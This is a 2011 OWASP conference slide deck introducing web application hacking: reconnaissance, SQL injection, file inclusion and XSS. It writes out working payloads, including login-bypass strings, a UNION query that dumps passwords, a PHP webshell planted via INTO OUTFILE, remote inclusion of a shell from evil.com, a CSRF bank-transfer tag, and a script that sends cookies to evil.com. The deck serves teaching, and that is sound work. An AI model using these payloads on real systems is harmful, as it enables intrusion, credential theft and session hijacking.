View
141
Download
0
Category
Preview:
Citation preview
Introduction to Ethical Web Application Hacking
Syed Zainudeen
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 1
OWASP DAY KL 2011, 20 September 2011
Overview
• Information Gathering
• SQL Injection
• File Inclusion
• XSS (Cross Site Scripting)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 2
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 3
Information Gathering
“Finding an apple in a basket will be like finding a needle in a haystack if you don’t
know what an apple is !”
- Syed Zainudeen -
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 4
Why we need to know the target?
• Speed up the process of finding vulnerabilities
• Increase the chance of a successful exploitation
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 5
What do we want to know?
• Address of our target
• OS type
• Running services
• What type of service software
• Any info on the target
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 6
Tools to check IP address
• ping (?)
• nslookup
• host
• dig
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 7
Tools for OS fingerprinting
• nmap
– Usage: nmap -O <host>
nmap -O www.website.com
• xprobe2
– Usage: xprobe2 <host>
xprobe2 www.website.com
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 8
Why we need to know the OS?
• Lets say that we found a vulnerability in a system that allows us to execute commands on the remote OS
• We send the command:
net user hacker 123456 /add
• However, we scratch our head wondering why the command didn’t work
• It WONT work if the target is a linux machine
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 9
nmap in action
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 10
Tools to scan for services
• nmap
– nmap -sT <host> • TCP Connect scan
nmap -sT www.website.com • SYN scan
nmap -sS www.website.com • UDP scan
nmap -sU www.website.com
• amap (discovering services on nonstandard ports)
– amap <host> <port>
amap www.website.com 49152
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 11
Service software detection tool
• Automated: – nmap –sV <host>
nmap –sV www.website.com
• Manual: – nc / telnet/putty (text based services)
• Usage: nc <host> <port>
– openssl (text based services + SSL) • Usage: openssl s_client –connect <host>:<port>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 12
HTTP banner grabbing
• Example:
– Using netcat: nc www.google.com 80
– Using telnet: telnet www.website.com 80
HEAD / HTTP/1.0 Host: www.google.com
HEAD / HTTP/1.0 Host: www.website.com
= Enter
HTTP banner grabbing demo
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 14
Additional ways to get information
• Spidering
• Error messages
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 15
SQL Injection
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 16
“SQL injection is like asking for extra plate/tissue/etc when all the waiter is
expecting is your order”
- Syed Zainudeen -
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 17
What is SQL injection ?
• SQL injection - inserting specially crafted SQL instructions for arbitrary SQL code execution
• Example: Inserting ' OR 1=1 # to bypass login page
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 18
Login bypass
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 19
Logged in as admin !
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 20
How did it works ?
• Behind the scene, there is an SQL instruction being executed
SELECT * FROM accounts WHERE username=' $user ' AND
password=' $pass '
• $user and $pass and are taken from the input box.
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 21
How did it works ? (injection)
SELECT * FROM accounts WHERE username='$user' AND
password='$pass'
• If $user equals ' OR 1=1 # and $pass is null then
the SQL instruction will be
SELECT * FROM accounts WHERE username=' ' OR 1=1 #' AND
password=''
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 22
How did it works ? (comment)
• # is a special character in MySQL which means line comment (similar to // for C) and anything that follows after it will be ignored
• The SQL without the comment is
SELECT * FROM accounts WHERE username='' OR 1=1 #' AND
password=''
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 23
How did it works ? (comparison)
SELECT * FROM accounts WHERE username='' OR 1=1
• 1=1 is a comparison that will result to a boolean value of TRUE (since 1 will always be equal to 1)
• The OR operator means that either of the condition must be true
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 24
How did it works ? (Boolean logic)
• Therefore:
SELECT * FROM accounts WHERE username='' OR 1=1
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 25
Boolean: ? OR TRUE Truth table for OR
Condition Result
FALSE or FALSE FALSE
FALSE or TRUE TRUE
TRUE or TRUE TRUE
TRUE or FALSE TRUE
Means: ? OR TRUE equals TRUE
How did it works ? (eureka!)
• Therefore the statement will always be true and this will be executed
SELECT * FROM accounts WHERE username='' OR 1=1
• All the rows will be returned but since the first row is the username admin, we logs in as admin
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 26
Exploits of a Mom
xkcd.com/327
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 27
Spotting a vulnerable application
• The easiest way to find an SQL injection vuln is by inserting a single quote ( ' )
• An error message will be displayed (if the server is configured to display error)
• Other possible responses might be:
– a blank page
– a web page with some of the elements missing
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 28
The single quote test
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 29
Exploting SQL injection vuln
• 3 rules of a successful exploitation
– Rule 1: The is no master SQL injection string !
– Rule 2: Think as a developer !
– Rule 3: Try, try and try !
• BTW, the rules won't help if you are facing a secure web application
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 30
Exploitation: Bypassing login page
• Common login bypass strings:
' OR 1=1 #
' OR 1=1 -- '
' OR ''='
' OR 1=1 OR '
' OR 1=1 LIMIT 1#
….
… use your imagination (and logic)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 31
Exploitation example: Login bypass
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 32
What can be done with SQLi ?
• Bypass login page (done !)
• Displaying private data
• Install a webshell
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 33
Displaying private data
• DONE using UNION <SQL query> #comment
' union select group_concat(<columns>),2,3 from <table name> #
Examples:
' union select group_concat(user,password),2,3 from users#
' union select group_concat(user,':',password),2,3 from
users#
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 34
Pwned !
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 35
Installing a webshell
• This is done using SELECT … INTO OUTFILE ….
• If we were attacking a xampp installation:
' union select '<?php system($_GET[c]); ?>',2,3 into outfile 'c:/xampp/htdocs/test.php' #
Note: • system() is a special PHP function to execute system
commands • File permission is required in order to use INTO OUTFILE
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 36
Pwned !!!
• We access the shell through:
http://<host>/test.php?c=<OS command>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 37
File Inclusion Attack
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 38
“File injection is akin to how bacteriophage injects bacteria with its genetic material”
- Syed Zainudeen -
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 39
File inclusion in web applications
• Sometimes web application developers code their application using separate modules in multiple files
• When needed, these modules can simply be included into their web app
• In PHP this is done by using include(), include_once(), require() or require_once()
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 40
Sample URL pattern
• Sample URL patterns that might use include():
http://website.com/?page=login.php
http://website.com/?page=register.php
http://website.com/?page=main.php
• The site most probably be coded like this
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 41
<?php
$page = $_GET['page'];
include($page);
?>
include()
• Include() and other similar function has the ability to include any file to be as part as the script that is currently executing
• Depending on the server configuration, include() can access not just local file path, but also web URLs
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 42
Sample attack
• What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and host it at http://evil.com/script.txt
• All the attacker needs to do now is to invoke the web application with this URL:
http://website.com/?page=http://evil.com/script.txt&c=ls
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 43
Spotting a vulnerable app
• All we have to do is prepend the suspected variables (GET/POST/injected variables) with ../
• Example: http://abc.com/?page=../register.php
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 44
Possible target of File Inclusion attack
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 45
Dot dot slash test in action
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 46
Types of File Inclusion Attack
• There are 2 types of File Inclusion attack
–Remote File Inclusion (RFI) • Easy to exploit (Very very dangerous !!!)
– Local File Inclusion (LFI) • Harder to inject code
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 47
RFI exploitation
1. Find a vulnerable URL (e.g. http://192.168.0.1/web/index.php?page=login.php)
2. Host our script on a web server (e.g. http://evil.com/shell.txt)
3. Exploit it (run our script) by requesting http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 48
RFI exploitation (cont.)
• Content of shell.txt
• In order to execute dir command, we can request for the following URL
http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt&c=dir
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 49
<?php system($_GET[c]); ?>
PWNED !!!
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 50
The LFI dilemma
• If a RFI attacks failed, we can opt for LFI
• But one big question remains,
HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST
PLACE ?
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 51
Getting your script to the server
• There are several ways to get your script to the server
– File/Image upload
– /proc/self/environ method
– Log file poisoning
• Once the script is accessible locally by the server, exploitation can proceed.
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 52
Cross Site Scripting (XSS)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 53
“XSS, malicious content by user, for user”
- Syed Zainudeen -
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 54
What is XSS ?
• XSS is a vulnerability that allows an attacker to inject client-side code on a webpage
• The client-side code can be of any client-side scripting language; Javascript, CSS, HTML, etc
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 55
How can it happen ?
• An attacker inserts specially crafted input string that allow the browser to interpret it as valid code
• Example:
What's your name:
Ali<script>alert('XSS')</script>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 56
XSS in action
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 57
Types of XSS
• There are 2 types of XSS
–Reflected XSS (non-persistent)
– Stored XSS (persistent)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 58
Reflected vs Stored
• In a reflected XSS, the injected string is used only once and discarded (not stored)
– E.g. search function
• In a stored XSS, the injected string is first stored in a DB and later loaded for display
– E.g. forum, guestbook, log
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 59
Reflected XSS
• The vulnerable page will only display user injected script if he/she follows a certain link/URL
• The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 60
Reflected XSS in action
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 61
Stored XSS
• The vulnerable page will display user injected script just by visiting to a vulnerable site (that has been injected)
• The malicious script in not visible in the URL (since it is usually loaded from DB)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 62
Stored XSS in action
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 63
What can we do with XSS?
• There's a lot that can be done with XSS vuln
– Webpage defacement (?)
– Cross Site Request Forgery (CSRF)
– Cookie stealing
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 64
Webpage defacement
• This is effective against stored XSS
• Creates an illusion of being hacked ! (Not a real hack)
• The way to deface is up to the creativity of the attacker. Some examples: – <script>document.body.innerHTML="Hacked!"</script>
– <iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100% ;height:100%"></iframe>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 65
XSS web defacement (script)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 66
XSS web defacement (iframe)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 67
Cross Site Request Forgery (CSRF)
• CSRF is a type of attack that enables an attacker to do things on behalf of the victim by using the trust that a webpage has on the victim
• How: The attacker send instructions to a victim, to be executed (by the victim) using session information of the victim.
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 68
CSRF explained
• Let say that a user is logged in to a bank (Low Security Bank, lsbank.com)
• A user then browse to other sites that contains the following (XSS injected) code:
<img
src="http://lsbank.com/transfer?amount=1000&to=hacker_acc
&submit=true" />
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 69
CSRF explained (cont.)
• The img tag will cause a GET request to the bank (lsbank.com)
• Since the user is currently logged in to the bank, he/she will unknowingly transfer $1000 to hacker_acc
• XSS + unsecured site = dangerous combination
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 70
Cookie stealing
• In CSRF, an attacker issues a command that gets executed using session information (cookie) of a victim
• The cookie is not captured in CSRF. The attacker doesn't know the victim's cookie.
• But using XSS, we can steal user cookie…
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 71
Why cookie is important ?
• When we log in to a website, the only way that the site knows who we are is based on the cookie information that our browser send.
• If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 72
Limitation of XSS cookie stealing
• XSS can be used to steal cookie but is has a limitation.
• XSS can only be used to steal user cookie of the site that is vulnerable to XSS
• Let say that facebook.com has an XSS vuln, an attacker can steal user cookie for facebook.com and use it to log in as the victim.
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 73
How to read cookie value?
• Javascript can be used to read user cookie
• We can view cookie data by using:
alert(document.cookie);
• document.cookie is a javascript variable that can view all non HTTP-Only cookie
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 74
Displaying user cookie
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 75
XSS cookie stealing
• An attacker can steal user cookie by using:
<script> document.write('<img src="http://evil.com/?dat=' +
escape(document.cookie) + ' " /> '); </script>
• This script will cause the user cookie to be sent to evil.com
• The attacker can log the cookies using any server side scripting language at evil.com
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 76
Modifying browser cookie
• The stolen cookies can then be retrieved and injected to the attacker's web browser
• There are many ways to modify a browser's cookie – Manually
• javascript injection at the address bar
– Using automated tools • Firecookie browser extension
• TamperData
• Paros proxy
• etc
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 77
Browsing with stolen cookie
• Once the victim's cookie have been planted, all that needs to be done is simply point the browser to the target site
• The attacker's browser will present the stolen cookie to the web server and possibly, the web server will identify the request as coming from the victim
• The attacker just hijacked the victim's session using XSS !
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 78
How session hijacking works
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 79
Web server Web Admin
SESSIONID=i45h0t3w4h
Normal User
Each user has unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between normal user and web admin
How session hijacking works (cont.)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 80
Web server Web Admin
SESSIONID=i45h0t3w4h
Due to an XSS vulnerability in Web Server, an attacker has injected some javascript code that steals visitor's session ID .
Evil.com
SESSIONID=i45h0t3w4h
Attacker
How session hijacking works (cont.)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 81
Web server Web Admin
SESSIONID=i45h0t3w4h
The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Web Admin.
Attacker
Thank you !
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 82
Recommended